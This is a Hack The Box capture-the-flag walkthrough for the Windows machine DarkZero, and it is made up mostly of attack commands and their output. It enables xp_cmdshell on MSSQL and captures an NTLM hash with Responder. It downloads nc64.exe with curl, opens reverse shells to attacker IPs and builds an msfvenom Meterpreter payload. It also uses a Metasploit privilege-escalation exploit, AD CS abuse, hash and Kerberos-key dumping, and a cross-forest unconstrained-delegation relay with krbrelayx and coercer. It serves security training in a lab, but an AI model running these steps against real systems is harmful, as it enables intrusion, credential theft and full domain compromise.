Hack The Box / WINDOWS / 2026-04-04
Hack The Box — DarkZero (Windows)
Initial AD foothold with provided credentials, MSSQL linked-server pivot to darkzero.ext, AD CS abuse and local privilege escalation to SYSTEM on DC02, then cross-forest unconstrained delegation abuse to compromise DC01 and obtain root.
Target
- IP:
10.129.43.136
Machine information
As is common in real-life pentests, you start the DarkZero box with credentials for the following account:
john.w / RFulUtONCOL!
Recon
sudo nmap -sC -sV 10.129.43.136 -p- -v
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-05 03:15:55Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Issuer: commonName=darkzero-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-07-29T11:40:00
| Not valid after: 2026-07-29T11:40:00
| MD5: ce57:1ac8:da76:eb62:efe8:4e85:045b:d440
|_SHA-1: 603a:f638:aabb:7eaa:1bdb:4256:5869:4de2:98b6:570c
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-ntlm-info:
| 10.129.43.136:1433:
| Target_Name: darkzero
| NetBIOS_Domain_Name: darkzero
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: darkzero.htb
| DNS_Computer_Name: DC01.darkzero.htb
| DNS_Tree_Name: darkzero.htb
|_ Product_Version: 10.0.26100
|_ssl-date: 2025-10-05T03:17:25+00:00; +1d20h13m45s from scanner time.
| ms-sql-info:
| 10.129.43.136:1433:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-05T02:21:39
| Not valid after: 2055-10-05T02:21:39
| MD5: 21a1:da01:fc4d:d3e2:07c3:b653:be7c:700f
|_SHA-1: f80d:e5ac:6fa4:c5ae:8f8d:ecf2:2fa9:2333:abc7:fb75
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Issuer: commonName=darkzero-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-07-29T11:40:00
| Not valid after: 2026-07-29T11:40:00
| MD5: ce57:1ac8:da76:eb62:efe8:4e85:045b:d440
|_SHA-1: 603a:f638:aabb:7eaa:1bdb:4256:5869:4de2:98b6:570c
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Issuer: commonName=darkzero-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-07-29T11:40:00
| Not valid after: 2026-07-29T11:40:00
| MD5: ce57:1ac8:da76:eb62:efe8:4e85:045b:d440
|_SHA-1: 603a:f638:aabb:7eaa:1bdb:4256:5869:4de2:98b6:570c
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49891/tcp open msrpc Microsoft Windows RPC
49908/tcp open msrpc Microsoft Windows RPC
49963/tcp open msrpc Microsoft Windows RPC
52238/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Enumerate SMB shares with the provided user:
nxc smb 10.129.43.136 -u 'john.w' -p 'RFulUtONCOL!' --shares
SMB 10.129.43.136 445 DC01 [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:False)
SMB 10.129.43.136 445 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
SMB 10.129.43.136 445 DC01 [*] Enumerated shares
SMB 10.129.43.136 445 DC01 Share Permissions Remark
SMB 10.129.43.136 445 DC01 ----- ----------- ------
SMB 10.129.43.136 445 DC01 ADMIN$ Remote Admin
SMB 10.129.43.136 445 DC01 C$ Default share
SMB 10.129.43.136 445 DC01 IPC$ READ Remote IPC
SMB 10.129.43.136 445 DC01 NETLOGON READ Logon server share
SMB 10.129.43.136 445 DC01 SYSVOL READ Logon server share
Add dc01.darkzero.htb and darkzero.htb to /etc/hosts.
Check LDAP auth:
nxc ldap dc01.darkzero.htb -u 'john.w' -p 'RFulUtONCOL!'
LDAP 10.129.43.136 389 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
LDAPS 10.129.43.136 636 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
Sync time:
sudo ntpdate dc01.darkzero.htb
Collect BloodHound data:
bloodhound-ce-python -u 'john.w' -p 'RFulUtONCOL!' -ns 10.129.43.136 -d 'darkzero.htb' -dc dc01.darkzero.htb -c All --zip
We get a zip file.
sudo bloodhound
Upload the zip.
Initial MSSQL access
mssqlclient.py -port 1433 -windows-auth 'DARKZERO'/'john.w':'RFulUtONCOL!'@dc01.darkzero.htb
We get a shell.
SELECT @@version
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Microsoft SQL Server 2022 (RTM) - 16.0.1000.6 (X64)
Oct 8 2022 05:58:25
Copyright (C) 2022 Microsoft Corporation
Enterprise Evaluation Edition (64-bit) on Windows Server 2025 Datacenter 10.0 <X64> (Build 26100: ) (Hypervisor)
SELECT name FROM master..sysdatabases;
name
------
master
tempdb
model
msdb
select * from master..sysservers
srvid srvstatus srvname srvproduct providername datasource location providerstring schemadate topologyx topologyy catalog srvcollation connecttimeout querytimeout srvnetname isremote rpc pub sub dist dpub rpcout dataaccess collationcompatible system useremotecollation lazyschemavalidation collation nonsqlsub
----- --------- ----------------- ---------- ------------ ----------------- -------- -------------- ---------- --------- --------- ------- ------------ -------------- ------------ ------------------------------ -------- --- --- --- ---- ---- ------ ---------- ------------------- ------ ------------------ -------------------- --------- ---------
0 1089 DC01 SQL Server SQLOLEDB DC01 NULL NULL 2025-07-29 08:14:07 0 0 NULL NULL 0 0 b'DC01 ' 1 1 0 0 0 0 1 0 0 0 1 0 NULL 0
1 1121 DC02.darkzero.ext SQL Server SQLOLEDB DC02.darkzero.ext NULL NULL 2025-07-29 08:37:16 0 0 NULL NULL 0 120 b'DC02.darkzero.ext ' 0 1 0 0 0 0 1 0 0 0 1 0 NULL 0
use_link[DC02.darkzero.ext]
SELECT system_user;
dc01_sql_svc
We are the sql_svc user.
Capture hash with Responder
On the attacker machine:
sudo responder -I tun0
On the victim machine, in SQL console:
EXEC master.sys.xp_dirtree '\\10.10.14.159\myshare',1, 1
On the Responder terminal we get:
[SMB] NTLMv2-SSP Client : 10.129.43.136
[SMB] NTLMv2-SSP Username : darkzero-ext\svc_sql
[SMB] NTLMv2-SSP Hash : svc_sql::darkzero-ext:9ce9bc8676640196:6A80358D54C16FD2EB70051FD52A041D:010100000000000000564209B435DC01FF6A948C4A35A5A50000000002000800380053004900330001001E00570049004E002D0037004B004600550036004F0052004300530035004B0004003400570049004E002D0037004B004600550036004F0052004300530035004B002E0038005300490033002E004C004F00430041004C000300140038005300490033002E004C004F00430041004C000500140038005300490033002E004C004F00430041004C000700080000564209B435DC01060004000200000008003000300000000000000000000000003000007E1B17E0CA069B04DA88A89FE109981FA172B4B6D085BE2AE0079C07F6D881D40A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100350039000000000000000000
Put the hash in a hash file.
hashcat -a 0 ./hash /usr/share/wordlists/rockyou.txt
It does not crack.
Command execution via SQL
In the SQL shell we can continue enumerating.
Check permissions:
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
There are many permissions.
Enable xp_cmdshell:
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
xp_cmdshell whoami
darkzero-ext\svc_sql
Now we can execute commands.
Reverse shell with nc64.exe
Download nc64.exe on the attacker machine:
wget https://github.com/int0x33/nc.exe/raw/refs/heads/master/nc64.exe
Upload it to the victim machine.
On attacker machine, start listeners:
python3 -m http.server 5555
rlwrap nc -vlnp 4444
In SQL shell:
xp_cmdshell mkdir C:\tmp
xp_cmdshell curl http://10.10.14.159:5555/nc64.exe -o C:\tmp\nc64.exe
xp_cmdshell C:\tmp\nc64.exe -e cmd.exe 10.10.14.159 4444
We get a reverse shell.
powershell
Details about installed Windows version:
(Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion") | Select-Object -Property *
We notice:
LCUVer : 10.0.20348.2113ProductName : Windows Server 2022 DatacenterReleaseId : 2009
ipconfig /all
We notice:
IPv4 Address. . . . . . . . . . . : 172.16.20.2(Preferred)
BloodHound from victim side
Download SharpHound.exe (https://github.com/SpecterOps/SharpHound) and upload it to the victim machine.
Run SharpHound on victim:
.\SharpHound.exe
A zip is created.
To download it to our machine, we can use smbserver:
smbserver.py -smb2support -username test12 -password test12 share $(pwd)
On victim machine:
net use \\10.10.14.159\share test12 /USER:test12
cp 20251004222116_BloodHound.zip \\10.10.14.159\share\
We now have the file and can upload it to BloodHound.
From BloodHound we see that the svc_sql user can enroll in several certificates: clientauth, efs, usersignature, user.
AD CS abuse with Certify and Rubeus
Upload Certify.exe (https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/Certify.exe) to the victim machine.
.\Certify.exe find /vulnerable
No vulnerable certificates are found.
The full CA name is DC02.darkzero.ext\darkzero-ext-DC02-CA.
.\Certify.exe find /ca:DC02.darkzero.ext\darkzero-ext-DC02-CA
We see the User template, which can also be used for client authentication.
.\Certify.exe request /ca:DC02.darkzero.ext\darkzero-ext-DC02-CA /template:User
A base64 certificate is printed.
Copy it into a file cert.pem.
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Set an empty password.
A cert.pfx file is created. Upload it to the victim machine.
Upload Rubeus.exe (https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/Rubeus.exe).
.\Rubeus.exe asktgt /getcredentials /user:svc_sql /certificate:cert.pfx /d:darkzero.ext /dc:dc02.darkzero.ext /show
We obtain:
NTLM : 816CCB849956B531DB139346751DB65F
In the end, this hash is not very useful by itself.
SYSTEM on DC02 via local exploit
Generate a Meterpreter reverse shell executable:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=tun0 LPORT=4444 -f exe -o reverse.exe
Upload it to the target machine. Set listener in Metasploit:
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set LHOST tun0
run
Run reverse.exe:
.\reverse.exe
We get a Meterpreter shell.
To understand whether there were working public exploits, I searched on cvedetails.com.
Go to https://www.cvedetails.com/.
Search for Windows Server 2022.
Find version 10.0.20348.2113.
There are vulnerabilities in 2025 and 2024.
You can inspect them.
I tried 2025 vulnerability exploits without success.
I found a working 2024 exploit. The vulnerability is: https://www.cvedetails.com/cve/CVE-2024-30038/.
The exploit is in Metasploit.
Put the current Meterpreter shell in background with CTRL+Z.
use windows/local/cve_2024_30088_authz_basep
sessions
Copy the session id.
set SESSION <id>
set payload windows/x64/meterpreter_reverse_tcp
set LHOST tun0
set LPORT 7777
run
We get a Meterpreter shell.
getuid
Server username: NT AUTHORITY\SYSTEM
hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6963aad8ba1150192f3ca6341355eb49:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:43e27ea2be22babce4fbcff3bc409a9d:::
svc_sql:1103:aad3b435b51404eeaad3b435b51404ee:816ccb849956b531db139346751db65f:::
DC02$:1000:aad3b435b51404eeaad3b435b51404ee:663a13eb19800202721db4225eadc38e:::
testpc$:1106:aad3b435b51404eeaad3b435b51404ee:008defc8e9f9bfb3ebca2f665d3e36b8:::
darkzero$:1105:aad3b435b51404eeaad3b435b51404ee:4276fdf209008f4988fa8c33d65a2f94:::
Get a nicer shell with nc64.exe, for example:
rlwrap nc -vlnp 4444
In Meterpreter shell:
shell
cd C:\tmp
.\nc64.exe -e cmd.exe 10.10.14.78 4444
We get a reverse shell.
powershell
In C:\Users\Administrator\Desktop we find the user flag.
Pivoting with Ligolo to reach DC02
Now it is better to use Ligolo to access DC02 more easily.
Download Ligolo (https://github.com/nicocha30/ligolo-ng).
On attacker machine:
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert
On victim machine:
.\agent.exe -connect 10.10.14.159:11601 -ignore-cert
We are connected to the proxy and now have a session.
ligolo-ng » session
Select session 1.
start
Now run:
sudo ip route add 172.16.20.0/24 dev ligolo
nxc smb 172.16.20.2 -u svc_sql -H '816CCB849956B531DB139346751DB65F'
SMB 172.16.20.2 445 DC02 [*] Windows Server 2022 Build 20348 x64 (name:DC02) (domain:darkzero.ext) (signing:True) (SMBv1:False)
SMB 172.16.20.2 445 DC02 [+] darkzero.ext\svc_sql:816CCB849956B531DB139346751DB65F
Add:
172.16.20.2 dc02.darkzero.ext darkzero.ext
to /etc/hosts.
Verify we can contact DC02:
ping dc02.darkzero.ext
Now, for example, if we want other shells besides Meterpreter shell, we can also use smbexec:
smbexec.py 'darkzero.ext/Administrator@dc02.darkzero.ext' -hashes ':6963aad8ba1150192f3ca6341355eb49'
We can use secretsdump.py to dump Kerberos keys, which we will need later:
secretsdump.py 'darkzero.ext'/'Administrator'@'dc02.darkzero.ext' -hashes ':6963aad8ba1150192f3ca6341355eb49'
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:3a9616ace37521e8a05bcaf6c68e3bbf44adfc7aa997b6123b7da6e39f7d0b3c
Administrator:aes128-cts-hmac-sha1-96:5da4b74154944739351c6da76d657a7d
Administrator:des-cbc-md5:ad1c6ec1df64a1e0
krbtgt:aes256-cts-hmac-sha1-96:e1b65b38be61373cad5930ace5bb65161460324e0c42c0ea14a73e4ac2314f4c
krbtgt:aes128-cts-hmac-sha1-96:133d768fd3a1214bba00fec89d2e56c1
krbtgt:des-cbc-md5:d04f0b3d3b385b31
DC02$:aes256-cts-hmac-sha1-96:fd92bfbfbc948bef1d1a04f7c342ca606b0eb72023a421b05a80561fbf3b28e2
DC02$:aes128-cts-hmac-sha1-96:1bd1d05e0abf42edc09e0c0064c010d3
DC02$:des-cbc-md5:bf926ea2ce765d46
We can enumerate the darkzero.ext domain with BloodHound:
bloodhound-ce-python -u 'Administrator' --hashes ':6963aad8ba1150192f3ca6341355eb49' -ns 172.16.20.2 -d 'darkzero.ext' -dc dc02.darkzero.ext -c All --zip
Upload the zip to BloodHound.
Run the query map domain trusts.
We notice there is a CrossForestTrust relationship between darkzero.htb and darkzero.ext.
It could also be found with PowerView.ps1:
Get-DomainTrustMapping
SourceName : darkzero.ext
TargetName : darkzero.htb
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FOREST_TRANSITIVE
TrustDirection : Bidirectional
WhenCreated : 7/29/2025 3:30:19 PM
WhenChanged : 9/29/2025 6:25:18 PM
SourceName : darkzero.htb
TargetName : darkzero.ext
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FOREST_TRANSITIVE
TrustDirection : Bidirectional
WhenCreated : 7/29/2025 3:30:19 PM
WhenChanged : 9/29/2025 6:25:18 PM
Cross-forest unconstrained delegation attack
The idea now is to perform Kerberos unconstrained delegation. Useful references:
- https://www.thehacker.recipes/ad/movement/kerberos/delegations/unconstrained
- https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/unconstrained-delegation.html?highlight=unconstrained#unconstrained-delegation-1
Make DC02 trusted for delegation:
python3 bloodyAD/bloodyAD.py --host dc02.darkzero.ext -d darkzero.ext --dc-ip 172.16.20.2 -u Administrator -p ':6963aad8ba1150192f3ca6341355eb49' add uac 'DC02$' -f TRUSTED_FOR_DELEGATION
[+] ['TRUSTED_FOR_DELEGATION'] property flags added to DC02$'s userAccountControl
Now we must add a fake SPN to DC02.
Download krbrelayx (https://github.com/dirkjanm/krbrelayx). In the repo there are also addspn.py and dnstool.py.
python3 krbrelayx/addspn.py -u 'darkzero.ext\Administrator' -p 'aad3b435b51404eeaad3b435b51404ee:6963aad8ba1150192f3ca6341355eb49' -t 'DC02$' -s host/attackersystem.darkzero.ext --additional dc02.darkzero.ext
[+] SPN Modified successfully
Now we must add a DNS record that points to us:
python3 bloodyAD/bloodyAD.py --host dc01.darkzero.htb -d darkzero.htb --dc-ip 10.10.11.89 -u john.w -p 'RFulUtONCOL!' add dnsRecord 'attackersystem.darkzero.ext' 10.10.14.78
[+] attackersystem.darkzero.ext has been successfully added
Run krbrelay in export mode, passing it the DC02 Kerberos key we dumped before:
python3 krbrelayx/krbrelayx.py -aesKey 'fd92bfbfbc948bef1d1a04f7c342ca606b0eb72023a421b05a80561fbf3b28e2'
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
Now we force DC01 to authenticate to attackersystem.darkzero.ext. Since DC02 has the SPN with attackersystem.darkzero.ext, DC01 will request a TGT from the KDC that includes that SPN. When it receives the TGT, DC01 forwards it to the ticket granting server, which I assume is the one on DC02. The ticket granting server decrypts the TGT and provides a token to DC01. Since DC02 is trusted for delegation, the token will contain DC01's TGT. DC01 then sends that token to attackersystem.darkzero.ext, which points to us, so it sends the token to us. Since we know the Kerberos key of DC02's KDC, we can decrypt the token and obtain DC01's TGT.
With coercer we force DC01 to authenticate:
coercer coerce -l 'attackersystem.darkzero.ext' -t 10.10.11.89 -u 'john.w' -p 'RFulUtONCOL!' -d darkzero.htb -v
In the terminal where krbrelayx.py is running, we get:
[*] SMBD: Received connection from 10.10.11.89
[*] Got ticket for DC01$@DARKZERO.HTB [krbtgt@DARKZERO.HTB]
[*] Saving ticket in DC01$@DARKZERO.HTB_krbtgt@DARKZERO.HTB.ccache
export KRB5CCNAME='DC01$@DARKZERO.HTB_krbtgt@DARKZERO.HTB.ccache'
secretsdump.py -k -no-pass 'darkzero.htb'/'DC01$'@dc01.darkzero.htb
We get several hashes, including:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5917507bdf2ef2c2b0a869a1cba40726:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:d02e3fe0986e9b5f013dad12b2350b3a:::
To get a shell on DC01 we can use smbexec.py:
smbexec.py 'darkzero.htb/Administrator@dc01.darkzero.htb' -hashes ':5917507bdf2ef2c2b0a869a1cba40726'
Try to get a more comfortable shell with nc64.exe:
mkdir C:\tmp
curl http://10.10.14.78:5555/nc64.exe -o C:\tmp\nc64.exe
Start listener:
rlwrap nc -vlnp 4444
Execute:
C:\tmp\nc64.exe -e cmd.exe 10.10.14.78 4444
We get a reverse shell.
whoami
nt authority\system
In C:\Users\Administrator\Desktop we find root.txt with the root flag.